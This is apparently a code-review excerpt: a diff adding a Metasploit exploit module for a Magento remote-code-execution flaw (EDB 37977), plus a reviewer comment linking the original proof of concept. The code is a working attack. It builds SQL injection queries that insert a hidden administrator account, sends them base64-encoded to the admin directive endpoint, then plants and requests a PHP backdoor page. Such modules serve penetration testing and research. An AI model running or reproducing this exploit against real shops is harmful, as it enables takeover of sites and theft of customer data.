modules/exploits/multi/http/magento_rce.rb

```diff
@@ -0,0 +1,276 @@
+          ['EDB', 37977]
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['php'],
+      'Targets'        => [
+        [ 'Magento CE <= 1.9.1.0', {}],
+        [ 'Magento EE <= 1.14.1.0', {}]
+      ],
+      'Arch'           => ARCH_PHP,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 28 2015'
+  ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'URI to Magento', '/magento'])
+      ], self.class
+    )
+  end
+
+  def check
+    res = send_request_cgi({ 'uri' => target_uri.path })
+    return unless res
+    return Exploit::CheckCode::Appears if res.body =~ /201[01234] Magento/
+    return Exploit::CheckCode::Detected if res.body.include?('Magento')
+  end
+
+  def exploit
+    @username = Rex::Text.rand_text_alpha(8)
+    @password = Rex::Text.rand_text_alpha(8)
+    @package_name = Rex::Text.rand_text_alpha(8)
+
+    # We generate a code 3XX error page, since magento only provides
+    # some for 5XX and 4XX, so we're sure to not overwrite anything.
+    page_name = "3#{Rex::Text.rand_text_numeric(2)}.php"
+
+    create_or_delete_admin('create')
+    cookie = obtain_session_cookie
+    create_backdoor(page_name, cookie)
+
+    print_status "Requesting malicious webpage"
+    send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, "errors/#{page_name}"),
+      'cookie' => cookie
+    })
+  end
+
+  def cleanup
+    remove_backdoor
+    create_or_delete_admin('delete')
+  end
+
+  def create_or_delete_admin(operation)
+    if operation == 'create'
+      query = "SET @SALT = 'rp';"
+      query << "SET @PASS = CONCAT(MD5(CONCAT( @SALT , '#{@password}') ), CONCAT(':', @SALT ));"
+      query << "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;"
+      query << "INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,"
+      query << "`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES"
+      query << "('Firstname','Lastname','email@example.com','#{@username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());"
+      query << "INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES"
+      query << "(1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '#{@username}'),'Firstname');"
+    elsif operation == 'delete'
+      query = "DELETE FROM `admin_role` WHERE `user_id` = (SELECT user_id FROM admin_user WHERE username = '#{@username}');"
+      query << "DELETE FROM `admin_user` WHERE `username` = '#{@username}';"
+    end
+
+    filter = Rex::Text.encode_base64('popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);' + query)
+
+    directive = Rex::Text.encode_base64url("{{block type=Adminhtml/report_search_grid output=getCsvFile}}")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'       => normalize_uri(target_uri.path, '/admin/Cms_Wysiwyg/directive/index/'),
```

Comment:
It works here with `'/admin/Cms_Wysiwyg/directive/index/'`.
You can test this by using the [original PoC]( https://www.exploit-db.com/exploits/37977/ ).